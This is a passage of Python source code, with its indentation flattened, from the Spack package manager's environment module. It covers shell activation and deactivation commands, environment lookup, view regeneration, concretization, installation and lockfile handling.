# NOTE: We're not changing the fish_prompt function (which is fish's
# solution to the PS1 variable) here. This is a bit fiddly, and easy to
# screw up => spend time reasearching a solution. Feedback welcome.
#
else:
if os.getenv('TERM') and 'color' in os.getenv('TERM') and prompt:
prompt = colorize('@G{%s} ' % prompt, color=True)
cmds += 'export SPACK_ENV=%s;\n' % env.path
cmds += "alias despacktivate='spack env deactivate';\n"
if prompt:
cmds += 'if [ -z ${SPACK_OLD_PS1+x} ]; then\n'
cmds += ' if [ -z ${PS1+x} ]; then\n'
cmds += " PS1='$$$$';\n"
cmds += ' fi;\n'
cmds += ' export SPACK_OLD_PS1="${PS1}";\n'
cmds += 'fi;\n'
cmds += 'export PS1="%s ${PS1}";\n' % prompt
#
# NOTE in the fish-shell: Path variables are a special kind of variable
# used to support colon-delimited path lists including PATH, CDPATH,
# MANPATH, PYTHONPATH, etc. All variables that end in PATH (case-sensitive)
# become PATH variables.
#
try:
if add_view and default_view_name in env.views:
with spack.store.db.read_transaction():
cmds += env.add_default_view_to_shell(shell)
except (spack.repo.UnknownPackageError,
spack.repo.UnknownNamespaceError) as e:
tty.error(e)
tty.die(
'Environment view is broken due to a missing package or repo.\n',
' To activate without views enabled, activate with:\n',
' spack env activate -V {0}\n'.format(env.name),
' To remove it and resolve the issue, '
'force concretize with the command:\n',
' spack -e {0} concretize --force'.format(env.name))
return cmds
def deactivate(shell='sh'):
"""Undo any configuration or repo settings modified by ``activate()``.
Arguments:
shell (string): One of `sh`, `csh`, `fish`. Shell style to use.
Returns:
(string): shell commands for `shell` to undo environment variables
"""
global _active_environment
if not _active_environment:
return
deactivate_config_scope(_active_environment)
# use _repo so we only remove if a repo was actually constructed
if _active_environment._repo:
spack.repo.path.remove(_active_environment._repo)
cmds = ''
if shell == 'csh':
cmds += 'unsetenv SPACK_ENV;\n'
cmds += 'if ( $?SPACK_OLD_PROMPT ) '
cmds += 'set prompt="$SPACK_OLD_PROMPT" && '
cmds += 'unsetenv SPACK_OLD_PROMPT;\n'
cmds += 'unalias despacktivate;\n'
elif shell == 'fish':
cmds += 'set -e SPACK_ENV;\n'
cmds += 'functions -e despacktivate;\n'
#
# NOTE: Not changing fish_prompt (above) => no need to restore it here.
#
else:
cmds += 'if [ ! -z ${SPACK_ENV+x} ]; then\n'
cmds += 'unset SPACK_ENV; export SPACK_ENV;\n'
cmds += 'fi;\n'
cmds += 'unalias despacktivate;\n'
cmds += 'if [ ! -z ${SPACK_OLD_PS1+x} ]; then\n'
cmds += ' if [ "$SPACK_OLD_PS1" = \'$$$$\' ]; then\n'
cmds += ' unset PS1; export PS1;\n'
cmds += ' else\n'
cmds += ' export PS1="$SPACK_OLD_PS1";\n'
cmds += ' fi;\n'
cmds += ' unset SPACK_OLD_PS1; export SPACK_OLD_PS1;\n'
cmds += 'fi;\n'
try:
if default_view_name in _active_environment.views:
with spack.store.db.read_transaction():
cmds += _active_environment.rm_default_view_from_shell(shell)
except (spack.repo.UnknownPackageError,
spack.repo.UnknownNamespaceError) as e:
tty.warn(e)
tty.warn('Could not fully deactivate view due to missing package '
'or repo, shell environment may be corrupt.')
tty.debug("Deactivated environmennt '%s'" % _active_environment.name)
_active_environment = None
return cmds
def find_environment(args):
"""Find active environment from args, spack.yaml, or environment variable.
This is called in ``spack.main`` to figure out which environment to
activate.
Check for an environment in this order:
1. via ``spack -e ENV`` or ``spack -D DIR`` (arguments)
2. as a spack.yaml file in the current directory, or
3. via a path in the SPACK_ENV environment variable.
If an environment is found, read it in. If not, return None.
Arguments:
args (Namespace): argparse namespace wtih command arguments
Returns:
(Environment): a found environment, or ``None``
"""
# try arguments
env = getattr(args, 'env', None)
# treat env as a name
if env:
if exists(env):
return read(env)
else:
# if env was specified, see if it is a dirctory otherwise, look
# at env_dir (env and env_dir are mutually exclusive)
env = getattr(args, 'env_dir', None)
# if no argument, look for the environment variable
if not env:
env = os.environ.get(spack_env_var)
# nothing was set; there's no active environment
if not env:
return None
# if we get here, env isn't the name of a spack environment; it has
# to be a path to an environment, or there is something wrong.
if is_env_dir(env):
return Environment(env)
raise SpackEnvironmentError('no environment in %s' % env)
def get_env(args, cmd_name, required=False):
"""Used by commands to get the active environment.
This first checks for an ``env`` argument, then looks at the
``active`` environment. We check args first because Spack's
subcommand arguments are parsed *after* the ``-e`` and ``-D``
arguments to ``spack``. So there may be an ``env`` argument that is
*not* the active environment, and we give it precedence.
This is used by a number of commands for determining whether there is
an active environment.
If an environment is not found *and* is required, print an error
message that says the calling command *needs* an active environment.
Arguments:
args (Namespace): argparse namespace wtih command arguments
cmd_name (str): name of calling command
required (bool): if ``True``, raise an exception when no environment
is found; if ``False``, just return ``None``
Returns:
(Environment): if there is an arg or active environment
"""
# try argument first
env = getattr(args, 'env', None)
if env:
if exists(env):
return read(env)
elif is_env_dir(env):
return Environment(env)
else:
raise SpackEnvironmentError('no environment in %s' % env)
# try the active environment. This is set by find_environment() (above)
if _active_environment:
return _active_environment
elif not required:
return None
else:
tty.die(
'`spack %s` requires an environment' % cmd_name,
'activate an environment first:',
' spack env activate ENV',
'or use:',
' spack -e ENV %s ...' % cmd_name)
def _root(name):
"""Non-validating version of root(), to be used internally."""
return os.path.join(env_path, name)
def root(name):
"""Get the root directory for an environment by name."""
validate_env_name(name)
return _root(name)
def exists(name):
"""Whether an environment with this name exists or not."""
if not valid_env_name(name):
return False
return os.path.isdir(root(name))
def active(name):
"""True if the named environment is active."""
return _active_environment and name == _active_environment.name
def is_env_dir(path):
"""Whether a directory contains a spack environment."""
return os.path.isdir(path) and os.path.exists(
os.path.join(path, manifest_name))
def read(name):
"""Get an environment with the supplied name."""
validate_env_name(name)
if not exists(name):
raise SpackEnvironmentError("no such environment '%s'" % name)
return Environment(root(name))
def create(name, init_file=None, with_view=None):
"""Create a named environment in Spack."""
validate_env_name(name)
if exists(name):
raise SpackEnvironmentError("'%s': environment already exists" % name)
return Environment(root(name), init_file, with_view)
def config_dict(yaml_data):
"""Get the configuration scope section out of an spack.yaml"""
key = spack.config.first_existing(yaml_data, spack.schema.env.keys)
return yaml_data[key]
def all_environment_names():
"""List the names of environments that currently exist."""
# just return empty if the env path does not exist. A read-only
# operation like list should not try to create a directory.
if not os.path.exists(env_path):
return []
candidates = sorted(os.listdir(env_path))
names = []
for candidate in candidates:
yaml_path = os.path.join(_root(candidate), manifest_name)
if valid_env_name(candidate) and os.path.exists(yaml_path):
names.append(candidate)
return names
def all_environments():
"""Generator for all named Environments."""
for name in all_environment_names():
yield read(name)
def _read_yaml(str_or_file):
"""Read YAML from a file for round-trip parsing."""
data = syaml.load_config(str_or_file)
filename = getattr(str_or_file, 'name', None)
default_data = spack.config.validate(
data, spack.schema.env.schema, filename)
return (data, default_data)
def _write_yaml(data, str_or_file):
"""Write YAML to a file preserving comments and dict order."""
filename = getattr(str_or_file, 'name', None)
spack.config.validate(data, spack.schema.env.schema, filename)
syaml.dump_config(data, str_or_file, default_flow_style=False)
def _eval_conditional(string):
"""Evaluate conditional definitions using restricted variable scope."""
arch = architecture.Arch(
architecture.platform(), 'default_os', 'default_target')
arch_spec = spack.spec.Spec('arch=%s' % arch)
valid_variables = {
'target': str(arch.target),
'os': str(arch.os),
'platform': str(arch.platform),
'arch': arch_spec,
'architecture': arch_spec,
'arch_str': str(arch),
're': re,
'env': os.environ,
'hostname': socket.gethostname()
}
return eval(string, valid_variables)
class ViewDescriptor(object):
def __init__(self, base_path, root, projections={}, select=[], exclude=[],
link=default_view_link):
self.base = base_path
self.root = root
self.projections = projections
self.select = select
self.select_fn = lambda x: any(x.satisfies(s) for s in self.select)
self.exclude = exclude
self.exclude_fn = lambda x: not any(x.satisfies(e)
for e in self.exclude)
self.link = link
def __eq__(self, other):
return all([self.root == other.root,
self.projections == other.projections,
self.select == other.select,
self.exclude == other.exclude,
self.link == other.link])
def to_dict(self):
ret = {'root': self.root}
if self.projections:
ret['projections'] = self.projections
if self.select:
ret['select'] = self.select
if self.exclude:
ret['exclude'] = self.exclude
if self.link != default_view_link:
ret['link'] = self.link
return ret
@staticmethod
def from_dict(base_path, d):
return ViewDescriptor(base_path,
d['root'],
d.get('projections', {}),
d.get('select', []),
d.get('exclude', []),
d.get('link', default_view_link))
def view(self):
root = self.root
if not os.path.isabs(root):
root = os.path.normpath(os.path.join(self.base, self.root))
return YamlFilesystemView(root, spack.store.layout,
ignore_conflicts=True,
projections=self.projections)
def __contains__(self, spec):
"""Is the spec described by the view descriptor
Note: This does not claim the spec is already linked in the view.
It merely checks that the spec is selected if a select operation is
specified and is not excluded if an exclude operator is specified.
"""
if self.select:
if not self.select_fn(spec):
return False
if self.exclude:
if not self.exclude_fn(spec):
return False
return True
def regenerate(self, all_specs, roots):
specs_for_view = []
specs = all_specs if self.link == 'all' else roots
for spec in specs:
# The view does not store build deps, so if we want it to
# recognize environment specs (which do store build deps),
# then they need to be stripped.
if spec.concrete: # Do not link unconcretized roots
# We preserve _hash _normal to avoid recomputing DAG
# hashes (DAG hashes don't consider build deps)
spec_copy = spec.copy(deps=('link', 'run'))
spec_copy._hash = spec._hash
spec_copy._normal = spec._normal
specs_for_view.append(spec_copy)
# regeneration queries the database quite a bit; this read
# transaction ensures that we don't repeatedly lock/unlock.
with spack.store.db.read_transaction():
installed_specs_for_view = set(
s for s in specs_for_view if s in self and s.package.installed)
# To ensure there are no conflicts with packages being installed
# that cannot be resolved or have repos that have been removed
# we always regenerate the view from scratch. We must first make
# sure the root directory exists for the very first time though.
root = self.root
if not os.path.isabs(root):
root = os.path.normpath(os.path.join(self.base, self.root))
fs.mkdirp(root)
with fs.replace_directory_transaction(root):
view = self.view()
view.clean()
specs_in_view = set(view.get_all_specs())
tty.msg("Updating view at {0}".format(self.root))
rm_specs = specs_in_view - installed_specs_for_view
add_specs = installed_specs_for_view - specs_in_view
# pass all_specs in, as it's expensive to read all the
# spec.yaml files twice.
view.remove_specs(*rm_specs, with_dependents=False,
all_specs=specs_in_view)
view.add_specs(*add_specs, with_dependencies=False)
class Environment(object):
def __init__(self, path, init_file=None, with_view=None):
"""Create a new environment.
The environment can be optionally initialized with either a
spack.yaml or spack.lock file.
Arguments:
path (str): path to the root directory of this environment
init_file (str or file object): filename or file object to
initialize the environment
with_view (str or bool): whether a view should be maintained for
the environment. If the value is a string, it specifies the
path to the view.
"""
self.path = os.path.abspath(path)
self.txlock = lk.Lock(self._transaction_lock_path)
# This attribute will be set properly from configuration
# during concretization
self.concretization = None
self.clear()
if init_file:
# If we are creating the environment from an init file, we don't
# need to lock, because there are no Spack operations that alter
# the init file.
with fs.open_if_filename(init_file) as f:
if hasattr(f, 'name') and f.name.endswith('.lock'):
self._read_manifest(default_manifest_yaml)
self._read_lockfile(f)
self._set_user_specs_from_lockfile()
else:
self._read_manifest(f, raw_yaml=default_manifest_yaml)
else:
with lk.ReadTransaction(self.txlock):
self._read()
if with_view is False:
self.views = {}
elif with_view is True:
self.views = {
default_view_name: ViewDescriptor(self.path,
self.view_path_default)}
elif isinstance(with_view, six.string_types):
self.views = {default_view_name: ViewDescriptor(self.path,
with_view)}
# If with_view is None, then defer to the view settings determined by
# the manifest file
def _re_read(self):
"""Reinitialize the environment object if it has been written (this
may not be true if the environment was just created in this running
instance of Spack)."""
if not os.path.exists(self.manifest_path):
return
self.clear()
self._read()
def _read(self):
default_manifest = not os.path.exists(self.manifest_path)
if default_manifest:
# No manifest, use default yaml
self._read_manifest(default_manifest_yaml)
else:
with open(self.manifest_path) as f:
self._read_manifest(f)
if os.path.exists(self.lock_path):
with open(self.lock_path) as f:
read_lock_version = self._read_lockfile(f)
if default_manifest:
# No manifest, set user specs from lockfile
self._set_user_specs_from_lockfile()
if read_lock_version == 1:
tty.debug(
"Storing backup of old lockfile {0} at {1}".format(
self.lock_path, self._lock_backup_v1_path))
shutil.copy(self.lock_path, self._lock_backup_v1_path)
def write_transaction(self):
"""Get a write lock context manager for use in a `with` block."""
return lk.WriteTransaction(self.txlock, acquire=self._re_read)
def _read_manifest(self, f, raw_yaml=None):
"""Read manifest file and set up user specs."""
if raw_yaml:
_, self.yaml = _read_yaml(f)
self.raw_yaml, _ = _read_yaml(raw_yaml)
else:
self.raw_yaml, self.yaml = _read_yaml(f)
self.spec_lists = OrderedDict()
for item in config_dict(self.yaml).get('definitions', []):
entry = copy.deepcopy(item)
when = _eval_conditional(entry.pop('when', 'True'))
assert len(entry) == 1
if when:
name, spec_list = next(iter(entry.items()))
user_specs = SpecList(name, spec_list, self.spec_lists.copy())
if name in self.spec_lists:
self.spec_lists[name].extend(user_specs)
else:
self.spec_lists[name] = user_specs
spec_list = config_dict(self.yaml).get(user_speclist_name)
user_specs = SpecList(user_speclist_name, [s for s in spec_list if s],
self.spec_lists.copy())
self.spec_lists[user_speclist_name] = user_specs
enable_view = config_dict(self.yaml).get('view')
# enable_view can be boolean, string, or None
if enable_view is True or enable_view is None:
self.views = {
default_view_name: ViewDescriptor(self.path,
self.view_path_default)}
elif isinstance(enable_view, six.string_types):
self.views = {default_view_name: ViewDescriptor(self.path,
enable_view)}
elif enable_view:
path = self.path
self.views = dict((name, ViewDescriptor.from_dict(path, values))
for name, values in enable_view.items())
else:
self.views = {}
# Retrieve the current concretization strategy
configuration = config_dict(self.yaml)
self.concretization = configuration.get('concretization')
@property
def user_specs(self):
return self.spec_lists[user_speclist_name]
def _set_user_specs_from_lockfile(self):
"""Copy user_specs from a read-in lockfile."""
self.spec_lists = {
user_speclist_name: SpecList(
user_speclist_name,
[str(s) for s in self.concretized_user_specs]
)
}
def clear(self):
self.spec_lists = {user_speclist_name: SpecList()} # specs from yaml
self.concretized_user_specs = [] # user specs from last concretize
self.concretized_order = [] # roots of last concretize, in order
self.specs_by_hash = {} # concretized specs by hash
self.new_specs = [] # write packages for these on write()
self._repo = None # RepoPath for this env (memoized)
self._previous_active = None # previously active environment
@property
def internal(self):
"""Whether this environment is managed by Spack."""
return self.path.startswith(env_path)
@property
def name(self):
"""Human-readable representation of the environment.
This is the path for directory environments, and just the name
for named environments.
"""
if self.internal:
return os.path.basename(self.path)
else:
return self.path
@property
def active(self):
"""True if this environment is currently active."""
return _active_environment and self.path == _active_environment.path
@property
def manifest_path(self):
"""Path to spack.yaml file in this environment."""
return os.path.join(self.path, manifest_name)
@property
def _transaction_lock_path(self):
"""The location of the lock file used to synchronize multiple
processes updating the same environment.
"""
return os.path.join(self.env_subdir_path, 'transaction_lock')
@property
def lock_path(self):
"""Path to spack.lock file in this environment."""
return os.path.join(self.path, lockfile_name)
@property
def _lock_backup_v1_path(self):
"""Path to backup of v1 lockfile before conversion to v2"""
return self.lock_path + '.backup.v1'
@property
def env_subdir_path(self):
"""Path to directory where the env stores repos, logs, views."""
return os.path.join(self.path, env_subdir_name)
@property
def repos_path(self):
return os.path.join(self.path, env_subdir_name, 'repos')
@property
def log_path(self):
return os.path.join(self.path, env_subdir_name, 'logs')
@property
def view_path_default(self):
# default path for environment views
return os.path.join(self.env_subdir_path, 'view')
@property
def repo(self):
if self._repo is None:
self._repo = make_repo_path(self.repos_path)
return self._repo
def included_config_scopes(self):
"""List of included configuration scopes from the environment.
Scopes are listed in the YAML file in order from highest to
lowest precedence, so configuration from earlier scope will take
precedence over later ones.
This routine returns them in the order they should be pushed onto
the internal scope stack (so, in reverse, from lowest to highest).
"""
scopes = []
# load config scopes added via 'include:', in reverse so that
# highest-precedence scopes are last.
includes = config_dict(self.yaml).get('include', [])
for i, config_path in enumerate(reversed(includes)):
# allow paths to contain spack config/environment variables, etc.
config_path = substitute_path_variables(config_path)
# treat relative paths as relative to the environment
if not os.path.isabs(config_path):
config_path = os.path.join(self.path, config_path)
config_path = os.path.normpath(os.path.realpath(config_path))
if os.path.isdir(config_path):
# directories are treated as regular ConfigScopes
config_name = 'env:%s:%s' % (
self.name, os.path.basename(config_path))
scope = spack.config.ConfigScope(config_name, config_path)
else:
# files are assumed to be SingleFileScopes
base, ext = os.path.splitext(os.path.basename(config_path))
config_name = 'env:%s:%s' % (self.name, base)
scope = spack.config.SingleFileScope(
config_name, config_path, spack.schema.merged.schema)
scopes.append(scope)
return scopes
def env_file_config_scope_name(self):
"""Name of the config scope of this environment's manifest file."""
return 'env:%s' % self.name
def env_file_config_scope(self):
"""Get the configuration scope for the environment's manifest file."""
config_name = self.env_file_config_scope_name()
return spack.config.SingleFileScope(config_name,
self.manifest_path,
spack.schema.env.schema,
[spack.schema.env.keys])
def config_scopes(self):
"""A list of all configuration scopes for this environment."""
return self.included_config_scopes() + [self.env_file_config_scope()]
def set_config(self, path, value):
"""Set configuration for this environment"""
yaml = config_dict(self.yaml)
keys = spack.config.process_config_path(path)
for key in keys[:-1]:
yaml = yaml[key]
yaml[keys[-1]] = value
self.write()
def destroy(self):
"""Remove this environment from Spack entirely."""
shutil.rmtree(self.path)
def update_stale_references(self, from_list=None):
"""Iterate over spec lists updating references."""
if not from_list:
from_list = next(iter(self.spec_lists.keys()))
index = list(self.spec_lists.keys()).index(from_list)
# spec_lists is an OrderedDict, all list entries after the modified
# list may refer to the modified list. Update stale references
for i, (name, speclist) in enumerate(
list(self.spec_lists.items())[index + 1:], index + 1
):
new_reference = dict((n, self.spec_lists[n])
for n in list(self.spec_lists.keys())[:i])
speclist.update_reference(new_reference)
def add(self, user_spec, list_name=user_speclist_name):
"""Add a single user_spec (non-concretized) to the Environment
Returns:
(bool): True if the spec was added, False if it was already
present and did not need to be added
"""
spec = Spec(user_spec)
if list_name not in self.spec_lists:
raise SpackEnvironmentError(
'No list %s exists in environment %s' % (list_name, self.name)
)
if list_name == user_speclist_name:
if not spec.name:
raise SpackEnvironmentError(
'cannot add anonymous specs to an environment!')
elif not spack.repo.path.exists(spec.name):
virtuals = spack.repo.path.provider_index.providers.keys()
if spec.name not in virtuals:
msg = 'no such package: %s' % spec.name
raise SpackEnvironmentError(msg)
list_to_change = self.spec_lists[list_name]
existing = str(spec) in list_to_change.yaml_list
if not existing:
list_to_change.add(str(spec))
self.update_stale_references(list_name)
return bool(not existing)
def remove(self, query_spec, list_name=user_speclist_name, force=False):
"""Remove specs from an environment that match a query_spec"""
query_spec = Spec(query_spec)
list_to_change = self.spec_lists[list_name]
matches = []
if not query_spec.concrete:
matches = [s for s in list_to_change if s.satisfies(query_spec)]
if not matches:
# concrete specs match against concrete specs in the env
# by *dag hash*, not build hash.
dag_hashes_in_order = [
self.specs_by_hash[build_hash].dag_hash()
for build_hash in self.concretized_order
]
specs_hashes = zip(
self.concretized_user_specs, dag_hashes_in_order
)
matches = [
s for s, h in specs_hashes
if query_spec.dag_hash() == h
]
if not matches:
raise SpackEnvironmentError(
"Not found: {0}".format(query_spec))
old_specs = set(self.user_specs)
new_specs = set()
for spec in matches:
if spec in list_to_change:
try:
list_to_change.remove(spec)
self.update_stale_references(list_name)
new_specs = set(self.user_specs)
except spack.spec_list.SpecListError:
# define new specs list
new_specs = set(self.user_specs)
msg = "Spec '%s' is part of a spec matrix and " % spec
msg += "cannot be removed from list '%s'." % list_to_change
if force:
msg += " It will be removed from the concrete specs."
# Mock new specs so we can remove this spec from
# concrete spec lists
new_specs.remove(spec)
tty.warn(msg)
# If force, update stale concretized specs
for spec in old_specs - new_specs:
if force and spec in self.concretized_user_specs:
i = self.concretized_user_specs.index(spec)
del self.concretized_user_specs[i]
dag_hash = self.concretized_order[i]
del self.concretized_order[i]
del self.specs_by_hash[dag_hash]
def concretize(self, force=False):
"""Concretize user_specs in this environment.
Only concretizes specs that haven't been concretized yet unless
force is ``True``.
This only modifies the environment in memory. ``write()`` will
write out a lockfile containing concretized specs.
Arguments:
force (bool): re-concretize ALL specs, even those that were
already concretized
Returns:
List of specs that have been concretized. Each entry is a tuple of
the user spec and the corresponding concretized spec.
"""
if force:
# Clear previously concretized specs
self.concretized_user_specs = []
self.concretized_order = []
self.specs_by_hash = {}
# Pick the right concretization strategy
if self.concretization == 'together':
return self._concretize_together()
if self.concretization == 'separately':
return self._concretize_separately()
msg = 'concretization strategy not implemented [{0}]'
raise SpackEnvironmentError(msg.format(self.concretization))
def _concretize_together(self):
"""Concretization strategy that concretizes all the specs
in the same DAG.
"""
# Exit early if the set of concretized specs is the set of user specs
user_specs_did_not_change = not bool(
set(self.user_specs) - set(self.concretized_user_specs)
)
if user_specs_did_not_change:
return []
# Check that user specs don't have duplicate packages
counter = collections.defaultdict(int)
for user_spec in self.user_specs:
counter[user_spec.name] += 1
duplicates = []
for name, count in counter.items():
if count > 1:
duplicates.append(name)
if duplicates:
msg = ('environment that are configured to concretize specs'
' together cannot contain more than one spec for each'
' package [{0}]'.format(', '.join(duplicates)))
raise SpackEnvironmentError(msg)
# Proceed with concretization
self.concretized_user_specs = []
self.concretized_order = []
self.specs_by_hash = {}
concrete_specs = spack.concretize.concretize_specs_together(
*self.user_specs
)
concretized_specs = [x for x in zip(self.user_specs, concrete_specs)]
for abstract, concrete in concretized_specs:
self._add_concrete_spec(abstract, concrete)
return concretized_specs
def _concretize_separately(self):
"""Concretization strategy that concretizes separately one
user spec after the other.
"""
# keep any concretized specs whose user specs are still in the manifest
old_concretized_user_specs = self.concretized_user_specs
old_concretized_order = self.concretized_order
old_specs_by_hash = self.specs_by_hash
self.concretized_user_specs = []
self.concretized_order = []
self.specs_by_hash = {}
for s, h in zip(old_concretized_user_specs, old_concretized_order):
if s in self.user_specs:
concrete = old_specs_by_hash[h]
self._add_concrete_spec(s, concrete, new=False)
# Concretize any new user specs that we haven't concretized yet
concretized_specs = []
for uspec, uspec_constraints in zip(
self.user_specs, self.user_specs.specs_as_constraints):
if uspec not in old_concretized_user_specs:
concrete = _concretize_from_constraints(uspec_constraints)
self._add_concrete_spec(uspec, concrete)
concretized_specs.append((uspec, concrete))
return concretized_specs
def concretize_and_add(self, user_spec, concrete_spec=None):
"""Concretize and add a single spec to the environment.
Concretize the provided ``user_spec`` and add it along with the
concretized result to the environment. If the given ``user_spec`` was
already present in the environment, this does not add a duplicate.
The concretized spec will be added unless the ``user_spec`` was
already present and an associated concrete spec was already present.
Args:
concrete_spec: if provided, then it is assumed that it is the
result of concretizing the provided ``user_spec``
"""
if self.concretization == 'together':
msg = 'cannot install a single spec in an environment that is ' \
'configured to be concretized together. Run instead:\n\n' \
' $ spack add <spec>\n' \
' $ spack install\n'
raise SpackEnvironmentError(msg)
spec = Spec(user_spec)
if self.add(spec):
concrete = concrete_spec or spec.concretized()
self._add_concrete_spec(spec, concrete)
else:
# spec might be in the user_specs, but not installed.
# TODO: Redo name-based comparison for old style envs
spec = next(
s for s in self.user_specs if s.satisfies(user_spec)
)
concrete = self.specs_by_hash.get(spec.build_hash())
if not concrete:
concrete = spec.concretized()
self._add_concrete_spec(spec, concrete)
return concrete
@property
def default_view(self):
if not self.views:
raise SpackEnvironmentError(
"{0} does not have a view enabled".format(self.name))
if default_view_name not in self.views:
raise SpackEnvironmentError(
"{0} does not have a default view enabled".format(self.name))
return self.views[default_view_name]
def update_default_view(self, viewpath):
name = default_view_name
if name in self.views and self.default_view.root != viewpath:
shutil.rmtree(self.default_view.root)
if viewpath:
if name in self.views:
self.default_view.root = viewpath
else:
self.views[name] = ViewDescriptor(self.path, viewpath)
else:
self.views.pop(name, None)
def regenerate_views(self):
if not self.views:
tty.debug("Skip view update, this environment does not"
" maintain a view")
return
specs = self._get_environment_specs()
for view in self.views.values():
view.regenerate(specs, self.roots())
def check_views(self):
"""Checks if the environments default view can be activated."""
try:
# This is effectively a no-op, but it touches all packages in the
# default view if they are installed.
for view_name, view in self.views.items():
for _, spec in self.concretized_specs():
if spec in view and spec.package.installed:
tty.debug(
'Spec %s in view %s' % (spec.name, view_name))
except (spack.repo.UnknownPackageError,
spack.repo.UnknownNamespaceError) as e:
tty.warn(e)
tty.warn(
'Environment %s includes out of date packages or repos. '
'Loading the environment view will require reconcretization.'
% self.name)
def _env_modifications_for_default_view(self, reverse=False):
all_mods = spack.util.environment.EnvironmentModifications()
errors = []
for _, spec in self.concretized_specs():
if spec in self.default_view and spec.package.installed:
try:
mods = uenv.environment_modifications_for_spec(
spec, self.default_view)
except Exception as e:
msg = ("couldn't get environment settings for %s"
% spec.format("{name}@{version} /{hash:7}"))
errors.append((msg, str(e)))
continue
all_mods.extend(mods.reversed() if reverse else mods)
return all_mods, errors
def add_default_view_to_shell(self, shell):
env_mod = spack.util.environment.EnvironmentModifications()
if default_view_name not in self.views:
# No default view to add to shell
return env_mod.shell_modifications(shell)
env_mod.extend(uenv.unconditional_environment_modifications(
self.default_view))
mods, errors = self._env_modifications_for_default_view()
env_mod.extend(mods)
if errors:
for err in errors:
tty.warn(*err)
# deduplicate paths from specs mapped to the same location
for env_var in env_mod.group_by_name():
env_mod.prune_duplicate_paths(env_var)
return env_mod.shell_modifications(shell)
def rm_default_view_from_shell(self, shell):
env_mod = spack.util.environment.EnvironmentModifications()
if default_view_name not in self.views:
# No default view to add to shell
return env_mod.shell_modifications(shell)
env_mod.extend(uenv.unconditional_environment_modifications(
self.default_view).reversed())
mods, _ = self._env_modifications_for_default_view(reverse=True)
env_mod.extend(mods)
return env_mod.shell_modifications(shell)
def _add_concrete_spec(self, spec, concrete, new=True):
"""Called when a new concretized spec is added to the environment.
This ensures that all internal data structures are kept in sync.
Arguments:
spec (Spec): user spec that resulted in the concrete spec
concrete (Spec): spec concretized within this environment
new (bool): whether to write this spec's package to the env
repo on write()
"""
assert concrete.concrete
# when a spec is newly concretized, we need to make a note so
# that we can write its package to the env repo on write()
if new:
self.new_specs.append(concrete)
# update internal lists of specs
self.concretized_user_specs.append(spec)
h = concrete.build_hash()
self.concretized_order.append(h)
self.specs_by_hash[h] = concrete
def install(self, user_spec, concrete_spec=None, **install_args):
"""Install a single spec into an environment.
This will automatically concretize the single spec, but it won't
affect other as-yet unconcretized specs.
"""
concrete = self.concretize_and_add(user_spec, concrete_spec)
self._install(concrete, **install_args)
def _install(self, spec, **install_args):
# "spec" must be concrete
spec.package.do_install(**install_args)
if not spec.external:
# Make sure log directory exists
log_path = self.log_path
fs.mkdirp(log_path)
with fs.working_dir(self.path):
# Link the resulting log file into logs dir
build_log_link = os.path.join(
log_path, '%s-%s.log' % (spec.name, spec.dag_hash(7)))
if os.path.lexists(build_log_link):
os.remove(build_log_link)
os.symlink(spec.package.build_log_path, build_log_link)
def install_all(self, args=None):
"""Install all concretized specs in an environment.
Note: this does not regenerate the views for the environment;
that needs to be done separately with a call to write().
"""
# If "spack install" is invoked repeatedly for a large environment
# where all specs are already installed, the operation can take
# a large amount of time due to repeatedly acquiring and releasing
# locks, this does an initial check across all specs within a single
# DB read transaction to reduce time spent in this case.
uninstalled_specs = []
with spack.store.db.read_transaction():
for concretized_hash in self.concretized_order:
spec = self.specs_by_hash[concretized_hash]
if not spec.package.installed:
uninstalled_specs.append(spec)
for spec in uninstalled_specs:
# Parse cli arguments and construct a dictionary
# that will be passed to Package.do_install API
kwargs = dict()
if args:
spack.cmd.install.update_kwargs_from_args(args, kwargs)
self._install(spec, **kwargs)
def all_specs(self):
"""Return all specs, even those a user spec would shadow."""
all_specs = set()
for h in self.concretized_order:
all_specs.update(self.specs_by_hash[h].traverse())
return sorted(all_specs)
def all_hashes(self):
"""Return hashes of all specs.
Note these hashes exclude build dependencies."""
return list(set(s.dag_hash() for s in self.all_specs()))
def roots(self):
"""Specs explicitly requested by the user *in this environment*.
Yields both added and installed specs that have user specs in
`spack.yaml`.
"""
concretized = dict(self.concretized_specs())
for spec in self.user_specs:
concrete = concretized.get(spec)
yield concrete if concrete else spec
def added_specs(self):
"""Specs that are not yet installed.
Yields the user spec for non-concretized specs, and the concrete
spec for already concretized but not yet installed specs.
"""
# use a transaction to avoid overhead of repeated calls
# to `package.installed`
with spack.store.db.read_transaction():
concretized = dict(self.concretized_specs())
for spec in self.user_specs:
concrete = concretized.get(spec)
if not concrete:
yield spec
elif not concrete.package.installed:
yield concrete
def concretized_specs(self):
"""Tuples of (user spec, concrete spec) for all concrete specs."""
for s, h in zip(self.concretized_user_specs, self.concretized_order):
yield (s, self.specs_by_hash[h])
def removed_specs(self):
"""Tuples of (user spec, concrete spec) for all specs that will be
removed on nexg concretize."""
needed = set()
for s, c in self.concretized_specs():
if s in self.user_specs:
for d in c.traverse():
needed.add(d)
for s, c in self.concretized_specs():
for d in c.traverse():
if d not in needed:
yield d
def _get_environment_specs(self, recurse_dependencies=True):
"""Returns the specs of all the packages in an environment.
If these specs appear under different user_specs, only one copy
is added to the list returned.
"""
spec_list = list()
for spec_hash in self.concretized_order:
spec = self.specs_by_hash[spec_hash]
specs = (spec.traverse(deptype=('link', 'run'))
if recurse_dependencies else (spec,))
spec_list.extend(specs)
return spec_list
def _to_lockfile_dict(self):
"""Create a dictionary to store a lockfile for this environment."""
concrete_specs = {}
for spec in self.specs_by_hash.values():
for s in spec.traverse():
dag_hash_all = s.build_hash()
if dag_hash_all not in concrete_specs:
spec_dict = s.to_node_dict(hash=ht.build_hash)
spec_dict[s.name]['hash'] = s.dag_hash()
concrete_specs[dag_hash_all] = spec_dict
hash_spec_list = zip(
self.concretized_order, self.concretized_user_specs)
# this is the lockfile we'll write out
data = {
# metadata about the format
'_meta': {
'file-type': 'spack-lockfile',
'lockfile-version': lockfile_format_version,
},
# users specs + hashes are the 'roots' of the environment
'roots': [{
'hash': h,
'spec': str(s)
} for h, s in hash_spec_list],
# Concrete specs by hash, including dependencies
'concrete_specs': concrete_specs,
}
return data
def _read_lockfile(self, file_or_json):
"""Read a lockfile from a file or from a raw string."""
lockfile_dict = sjson.load(file_or_json)
self._read_lockfile_dict(lockfile_dict)
return lockfile_dict['_meta']['lockfile-version']
def _read_lockfile_dict(self, d):
"""Read a lockfile dictionary into this environment."""
roots = d['roots']
